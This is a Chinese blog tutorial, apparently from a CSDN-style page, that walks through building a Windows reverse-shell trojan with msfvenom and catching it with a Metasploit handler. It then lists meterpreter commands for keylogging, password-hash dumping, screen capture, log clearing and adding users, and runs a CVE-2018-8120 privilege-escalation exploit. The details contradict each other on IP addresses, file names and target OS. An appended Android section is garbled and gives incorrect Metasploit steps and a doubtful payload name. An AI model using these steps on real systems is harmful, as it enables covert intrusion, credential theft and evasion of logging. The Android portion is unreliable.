MSF生成一个木马与使用

原理:

利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中。

准备:

目标:win7 x64专业版
攻击主机:Kali IP:192.168.1.143

生成:

生成test.exe木马文件
Step1:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=12345 -f exe > /root/test.exe
在这里插入图片描述

使用:

Step1:输入msfconsole进入metasploit
在这里插入图片描述

Step2:进入监听模块
Use exploit/multi/handler
在这里插入图片描述

Step3:设置payload反弹
Set payload windows/meterpreter/reverse_tcp
在这里插入图片描述

Step4:设置LHOST、LPORT参数
set LHOST 192.168.1.143(要监听的本地IP)
set LPORT 12345(要监听本地端口)
在这里插入图片描述

Step5:exploit攻击开始
在这里插入图片描述

Step6:把生成的木马文件hacker.exe拷贝到靶机WinXP系统中
在测试机中运行该exe文件,回到kali
在这里插入图片描述
出现该界面,表示渗透成功,可以对测试机进行一波操作了。

meterpreter下的命令:
getwd 当前目录
dir 查看所有文件
cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
download c:\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息

键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop

屏幕截图
screenshot

屏幕监控
run vnc

获取密文密码
hashdump

shell
获取shell,进入cmd

cmd下(测试机是windows):

dir:显示所有文件
cd:切换目录
whoami 查看当前用户级别
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码

演示一下上传漏洞实现本地提权
CVE-2018-8120.exe (漏洞目录在kali的/root/CVE-2018-8120.exe)
在这里插入图片描述

出现了乱码现象,这是编码的问题,在编辑->首选项->兼容性->修改编码—>改成中文的GB2312退出再次shell
在这里插入图片描述
CVE-2018-8120.exe ‘whoami’ 运行,有些机子可以,有些不可以。

Kali Linux是一个著名的开源渗透测试平台,其中包含Metasploit Framework (MSF) 这个强大的攻击工具集。如果你想在Kali里利用Metasploit生成针对Android的恶意软件(木马),你需要按照以下步骤操作: 1. **安装 Metasploit**:首先,在终端中更新系统并安装Metasploit框架: ``` sudo apt-get update sudo apt-get install -y metasploit-framework ``` 2. **加载 Android payload**:在Metasploit的交互模式(`meterpreter>`提示符下),输入`use exploit/multi/handler`选择通用处理器的处理程序。然后输入`set platform android`设置目标平台为Android。 3. **选择payload**:查看可用的Android payload,如 `search 'android'`。例如,如果你想要发送短信诱导用户点击,可以使用`exploit/multi/handler -p android/meterpreter/reverse_sms`。记得替换`RHOSTS`、`LPORT`等变量为你实际的目标主机和端口。 4. **配置Payload**:设置接收连接的IP地址和端口,以及必要的权限提升选项等。 5. **生成木马**:最后,运行命令`run`执行生成过程,Metasploit会生成一个Android木马文件,通常以`.apk`文件形式提供。 ```plaintext meterpreter > use exploit/multi/handler meterpreter > set platform android meterpreter > search 'android' [*] Modules matching the query 'android': [+] exploit/multi/handler - Multi-handler for exploitation payloads [+] exploit/multi/handler/android/meterpreter/reverse_https - HTTPS reverse TCP handler for Android [+] exploit/multi/handler/android/meterpreter/reverse_http - HTTP reverse TCP handler for Android ... meterpreter > set payload android/meterpreter/reverse_sms meterpreter > set lhost <your_ip_address> meterpreter > set lport <your_port> meterpreter > run [*] Generating stage... [*] Sending staging package... [*] Meterpreter session 1 opened (<your_ip_address>:<your_port>) at <target_device>:<received_port> by 192.168.1.10 as uid 0 ```
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值